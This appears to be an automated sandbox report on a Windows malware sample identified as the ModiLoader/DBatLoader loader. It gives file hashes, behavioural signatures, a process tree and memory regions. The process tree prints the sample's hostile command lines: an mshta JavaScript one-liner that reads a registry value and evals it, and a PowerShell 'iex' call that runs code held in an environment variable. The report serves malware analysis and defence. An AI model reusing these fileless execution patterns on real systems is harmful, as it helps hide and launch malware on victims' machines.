Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/09/2024, 09:04

General

  • Target

    da03c8eb57f00fdf1990908c9288fb7d_JaffaCakes118.exe

  • Size

    351KB

  • MD5

    da03c8eb57f00fdf1990908c9288fb7d

  • SHA1

    4699c36972e54b39dfdcddf4b8f2831fe110ecb8

  • SHA256

    b64a1418fc066bd6cb2489b5ab9b60b5660c6e6cc19997e9304ddae8d0785f80

  • SHA512

    c3f34df86b3b1506d582145309b381416854b82edaa2060821070cf333cfdd644ed390c46aff15676fea8cd49ec92d1cd39a2f6fc1deba58f24781d8b4924418

  • SSDEEP

    6144:1C3lEFuM6EtvB9qSV41vMTAINUACvSXhD1em/MtisIX4pE2FXjrh:1C3lEkKpcywUTA3ADL/M0Z2v

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\da03c8eb57f00fdf1990908c9288fb7d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\da03c8eb57f00fdf1990908c9288fb7d_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    PID:5056
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:g7m6uXDp="Hlxj5";Z4Z7=new%20ActiveXObject("WScript.Shell");xVpvl7bd="2JPa2xa2";wJdF5=Z4Z7.RegRead("HKCU\\software\\Je069ctNX\\WuG44J");GXRtpt41="GqUMV6KJ";eval(wJdF5);KUkH0V5="QiAm1Rf";
    1⤵
    • Process spawned unexpected child process
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:fkyaayqz
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4188

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pivynlws.lo3.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4188-15-0x0000000006350000-0x00000000063B6000-memory.dmp

    Filesize

    408KB

  • memory/4188-26-0x0000000006880000-0x000000000689E000-memory.dmp

    Filesize

    120KB

  • memory/4188-28-0x00000000080C0000-0x000000000873A000-memory.dmp

    Filesize

    6.5MB

  • memory/4188-29-0x0000000006DA0000-0x0000000006DBA000-memory.dmp

    Filesize

    104KB

  • memory/4188-27-0x00000000068D0000-0x000000000691C000-memory.dmp

    Filesize

    304KB

  • memory/4188-14-0x0000000006270000-0x00000000062D6000-memory.dmp

    Filesize

    408KB

  • memory/4188-25-0x00000000063C0000-0x0000000006714000-memory.dmp

    Filesize

    3.3MB

  • memory/4188-12-0x0000000005BD0000-0x00000000061F8000-memory.dmp

    Filesize

    6.2MB

  • memory/4188-13-0x0000000005AE0000-0x0000000005B02000-memory.dmp

    Filesize

    136KB

  • memory/4188-11-0x0000000003160000-0x0000000003196000-memory.dmp

    Filesize

    216KB

  • memory/5056-3-0x0000000002390000-0x000000000246C000-memory.dmp

    Filesize

    880KB

  • memory/5056-9-0x0000000002390000-0x000000000246C000-memory.dmp

    Filesize

    880KB

  • memory/5056-8-0x0000000002390000-0x000000000246C000-memory.dmp

    Filesize

    880KB

  • memory/5056-1-0x0000000000400000-0x000000000045DD20-memory.dmp

    Filesize

    375KB

  • memory/5056-0-0x0000000000455000-0x0000000000457000-memory.dmp

    Filesize

    8KB

  • memory/5056-2-0x0000000000400000-0x000000000045DD20-memory.dmp

    Filesize

    375KB

  • memory/5056-6-0x0000000002390000-0x000000000246C000-memory.dmp

    Filesize

    880KB

  • memory/5056-7-0x0000000002390000-0x000000000246C000-memory.dmp

    Filesize

    880KB

  • memory/5056-4-0x0000000002390000-0x000000000246C000-memory.dmp

    Filesize

    880KB

  • memory/5056-5-0x0000000002390000-0x000000000246C000-memory.dmp

    Filesize

    880KB

  • memory/5056-30-0x0000000000455000-0x0000000000457000-memory.dmp

    Filesize

    8KB